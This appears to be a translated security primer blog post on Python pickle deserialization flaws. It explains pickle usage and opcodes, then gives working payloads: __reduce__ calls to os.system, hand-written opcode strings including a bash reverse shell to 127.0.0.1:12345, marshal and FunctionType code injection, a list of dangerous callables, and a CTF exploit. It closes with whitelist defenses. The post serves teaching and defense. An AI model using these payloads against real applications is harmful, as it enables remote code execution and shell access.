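Introduction
Like other languages, Python provides ways to serialize and deserialize objects.
Python serialization is mainly done with three modules: pickle, marshal, and json.
pickle library: https://docs.python.org/zh-cn/3/library/pickle.html
The marshal module is more primitive; pickle is generally the first choice for serializing Python objects.
JSON serializes to a text format that is human-readable. pickle serializes to a binary format that is not.
JSON can only serialize Python's built-in types and cannot represent custom classes. pickle can represent a large number of Python data types, including user-defined classes.
JSON is more interoperable, whereas pickle is specific to Python.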
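A minimal sketch of the difference described above. The Point class is hypothetical and exists only for illustration: json.dumps rejects an instance of a user-defined class, while pickle round-trips it.

```python
import json
import pickle


class Point:
    """Hypothetical user-defined class, used only for illustration."""

    def __init__(self, x, y):
        self.x = x
        self.y = y


p = Point(1, 2)

# json only knows how to encode built-in types, so this raises TypeError.
try:
    json.dumps(p)
    json_ok = True
except TypeError:
    json_ok = False

# pickle records the class by module and name, plus the instance state.
restored = pickle.loads(pickle.dumps(p))
print(json_ok, type(restored).__name__, restored.x, restored.y)
```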
Usage
Serialization
Write the pickled object to a file object:
pickle.dump(obj, file, protocol=None, *, fix_imports=True)
Return the pickled object as a bytes object:
pickle.dumps(obj, protocol=None, *, fix_imports=True)
Deserialization
Read a pickled object from a file object:
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict")
Read a pickled object from a bytes object:
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")
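The four calls above can be sketched as a round trip. The sample dictionary is made up, and io.BytesIO stands in for a real file opened in binary mode.

```python
import io
import pickle

data = {"name": "demo", "values": [1, 2, 3]}

# dumps/loads work on bytes objects held in memory.
blob = pickle.dumps(data)
from_bytes = pickle.loads(blob)

# dump/load work on any binary file object; BytesIO stands in for a file
# opened with open(path, "wb") and open(path, "rb").
buffer = io.BytesIO()
pickle.dump(data, buffer)
buffer.seek(0)
from_file = pickle.load(buffer)

print(from_bytes == data, from_file == data)
```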
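protocol: the data stream format
There are 5 pickling protocols (0 to 4) up to Python 3.7; Python 3.8 added protocol 5. The higher the protocol version used, the newer the Python version needed to read the resulting pickle.
Only protocol = 0 produces human-readable output; all other versions contain non-printable characters.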
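A small sketch to check the readability claim on your own interpreter. The sample object and the definition of "readable" (printable ASCII plus newline) are assumptions made for this illustration.

```python
import pickle

obj = ["abc", 1]
readable = {}

for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(obj, protocol=proto)
    # Treat printable ASCII plus newline as "readable".
    readable[proto] = all(32 <= b < 127 or b == 10 for b in blob)
    print(proto, readable[proto], blob)
```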
pickletools
A standard-library tool for analyzing pickle-serialized data.
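As a rough illustration, pickletools.dis prints a symbolic listing of a pickle stream. The sample tuple is arbitrary, and the listing is captured in a StringIO here only so it can be inspected afterwards.

```python
import io
import pickle
import pickletools

blob = pickle.dumps(("abc", 1), protocol=0)

# dis() writes one line per opcode (offset, opcode name, argument) to `out`.
# It only parses the stream; it does not rebuild the pickled object.
out = io.StringIO()
pickletools.dis(blob, out=out)
listing = out.getvalue()
print(listing)
```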
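The __reduce__ method
https://docs.python.org/zh-cn/3.7/library/pickle.html#object.__reduce__
When a class defines __reduce__, pickle serializes whatever that method returns instead of the object's normal state, so the method completely changes what gets serialized.
If the return value is a string, pickle treats it as the name of a global object, looks that object up, and serializes it.
If the return value is a tuple (two to five items in the Python 3.7 documentation linked above; Python 3.8 added an optional sixth), the first item is a callable, the second is the tuple of arguments for that callable, and the remaining items are optional.
The second form is used here to build a command-execution payload: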
import os
import pickle

class A(object):
    # On load, pickle calls os.system('id') instead of rebuilding an A.
    def __reduce__(self):
        return (os.system, ('id',))

p = pickle.dumps(A())
print(p)
print(pickle.loads(p))
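In Python 2 the class must inherit from object (a new-style class) for this to work; in Python 3 that is unnecessary, because every class is new-style.
[Screenshots in the original post: without inheriting from object; inheriting from object]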
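To see the mechanism without running a shell command, here is a harmless sketch of the same tuple form. The Demo class and the choice of operator.add are assumptions made for illustration; the point is that loads() returns whatever the callable returns.

```python
import operator
import pickle


class Demo:
    """Hypothetical class; __reduce__ tells pickle how to 'rebuild' it."""

    def __reduce__(self):
        # (callable, args): the unpickler will call operator.add(2, 3).
        return (operator.add, (2, 3))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)

# The result is the callable's return value, not a Demo instance.
print(type(result).__name__, result)
```

Swapping operator.add for os.system is all that separates this sketch from the payload above, which is why untrusted pickles must never be loaded.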
Useful functions
Callables worth considering when building a payload (several of them, such as execfile, file, commands.*, dircache.*, popen2.* and posixfile.*, exist only in Python 2):
eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads, cPickle.load, cPickle.loads,
subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen,
commands.getstatusoutput, commands.getoutput, commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive,
dircache.listdir, dircache.opendir,
io.open,
popen2.popen2, popen2.popen3, popen2.popen4,
timeit.timeit, timeit.repeat,
sys.call_tracing,
code.interact, code.compile_command, codeop.compile_command,
pty.spawn,
posixfile.open, posixfile.fileopen,
platform.popen
The input function
In Python 2, input() evaluates the text it reads as a Python expression, so it can be used to execute code:
daolgts@DESKTOP-4DDBUKG:~$ python
Python 2.7.15+ (default, Nov 27 2018, 23:36:35)
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> input("")
__import__('os').system('id')
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0
Payload (Python 2). It replaces sys.stdin with a StringIO holding the expression, then calls input(), which evaluates it:
import pickle

# Reverse shell
a = '''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

# Replace ***** with a custom command
a = '''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('*****')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

pickle.loads(a)
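Constructing arbitrary functions
https://checkoway.net/musings/pickle/
Combine types.FunctionType with marshal.loads: marshal a function's code object, then have the pickle rebuild a function from it and call it.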
# Python 2 only: relies on func_code, the print statement and 'string-escape'.
import base64
import marshal
import pickle

def foo():
    import os
    os.system('whoami')

# payload1: the marshalled code object travels base64-encoded.
payload1 = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)

# payload2: the marshalled code object is embedded as an escaped string.
payload2 = """ctypes
FunctionType
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR.""" % marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)
The same technique works with new.function (from Python 2's new module) in place of types.FunctionType:
# Python 2 only: relies on the new module, func_code and 'string-escape'.
import base64
import marshal
import pickle

def foo():
    import os
    # os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')
    os.system('whoami')

# payload1: the marshalled code object travels base64-encoded.
payload1 = """cnew
function
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)

# payload2: the marshalled code object is embedded as an escaped string.
payload2 = """cnew
function
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR.""" % marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)
Class-based construction
In Python 2, pickling an instance of an old-style class named system whose __module__ is os emits an i (INST) opcode. On load, pickle looks up os.system and calls it with the tuple returned by __getinitargs__.
Payload:
payload = pickle.dumps(new.classobj('system', (), {'__getinitargs__': lambda self, arg=('id',): arg, '__module__': 'os'})())
>>> import new
>>> import pickle
>>> payload = pickle.dumps(new.classobj('system', (), {'__getinitargs__': lambda self, arg=('id',): arg, '__module__': 'os'})())
>>> payload
"(S'id'\np1\nios\nsystem\np2\n(dp3\nb."
>>> pickle.loads(payload)
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0
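Writing pickle code by hand
As mentioned earlier, pickle code is readable when protocol = 0, so it can also be written by hand.
https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code
c: imports a module and an object; the module name and the object name are each terminated by a newline. (The find_class check happens at this step. In other words, as long as the arguments of the c opcode pass find_class, objects obtained by other means are not affected by the sandbox, which is why the linked write-up uses getattr to obtain objects.)
(: pushes a mark onto the stack, indicating where a tuple begins
t: searches down from the top of the stack for the nearest (, pops everything between that ( and the t, builds a tuple from it, and pushes the tuple onto the stack
R: pops a tuple and a callable from the stack, calls the callable with the tuple as its argument list, and pushes the return value onto the stack
p: stores the element on top of the stack in the memo; the number after p is the element's index in the memo
V, S: push a (unicode) string onto the stack
.: marks the end of the whole program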
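The opcodes listed above can be sketched as a hand-written stream. This example targets Python 3 and deliberately calls the harmless builtins.len; the choice of callable and argument is an assumption made for illustration.

```python
import pickle

# Hand-written protocol 0 stream, one opcode per line of the literal.
handmade = (
    b"cbuiltins\nlen\n"  # c: push builtins.len (resolved through find_class)
    b"("                 # (: push a mark
    b"S'abc'\n"          # S: push the string 'abc'
    b"t"                 # t: pop back to the mark and push the tuple ('abc',)
    b"R"                 # R: pop the tuple and the callable, push len('abc')
    b"."                 # .: stop; the top of the stack is the result
)

value = pickle.loads(handmade)
print(value)
```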
anapickle
Toolset for writing shellcode in Python’s Pickle language and for manipulating pickles to inject shellcode.
https://github.com/sensepost/anapickle
code-breaking picklecode
https://github.com/phith0n/code-breaking/tree/master/2018/picklecode
Write-up: https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#
SUCTF2019 guess_game
https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game
Write-up: https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup
Exploit:
exp = b'''cguess_game
game
}S"win_count"
I10
sS"round_count"
I9
sbcguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00numberq\x03K\x01sb.'''
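One way to read the exploit without the challenge code is to list its opcodes with pickletools.genops, which only parses the stream and never imports guess_game. Reading the listing, the stream appears to fetch the existing guess_game.game object, apply a dict with win_count=10 and round_count=9 to it through BUILD, and then build a Ticket with number=1 as the returned object. The bytes literal below is the exp above, split across lines only for width.

```python
import pickletools

# Same bytes as exp in the write-up, split into adjacent literals.
exp = (
    b'cguess_game\ngame\n}S"win_count"\nI10\nsS"round_count"\nI9\nsb'
    b'cguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02'
    b'X\x06\x00\x00\x00numberq\x03K\x01sb.'
)

# genops yields (opcode, argument, position) without executing anything.
ops = [(op.name, arg) for op, arg, pos in pickletools.genops(exp)]
for name, arg in ops:
    print(name, arg)
```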
Restricting Globals
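Override find_class, as the official documentation recommends, and use a whitelist to restrict which objects deserialization may import.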
https://docs.python.org/3.7/library/pickle.html#pickle-restrict
import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()
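A short usage sketch of the whitelist approach, repeating a compact copy of the unpickler so the snippet runs on its own. The two inputs are illustrative: one pickle that needs only the whitelisted range, and one hand-written stream that asks for os.system.

```python
import builtins
import io
import pickle

SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Allowed: plain containers plus one whitelisted global (range).
allowed = restricted_loads(pickle.dumps([1, 2, range(15)]))

# Rejected: the c opcode asks for os.system, which is not whitelisted,
# so find_class raises before anything is called.
try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
    blocked, message = False, ""
except pickle.UnpicklingError as exc:
    blocked, message = True, str(exc)

print(allowed, blocked, message)
```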
pickleFilter
https://github.com/Qianlitp/pickleFilter/
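It adds a decorator to the load_reduce function to intercept untrusted callables, which reduces, to some extent, the damage that deserialization flaws in the pickle module can cause.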
https://docs.python.org/zh-cn/3/library/pickle.html
http://www.polaris-lab.com/index.php/archives/178/
http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/
https://xz.aliyun.com/t/2289
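By: 道萝岗特森's Blog
Original link: https://daolgts.github.io/2019/09/20/python%20pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E/
Copyright notice: copyright belongs to the author. Please contact us for removal in case of infringement.
Originally published on the WeChat official account 开源聚合网络空间安全研究院: 【安全科普】Python之pickle反序列漏洞 ([Security Primer] Python pickle deserialization vulnerabilities)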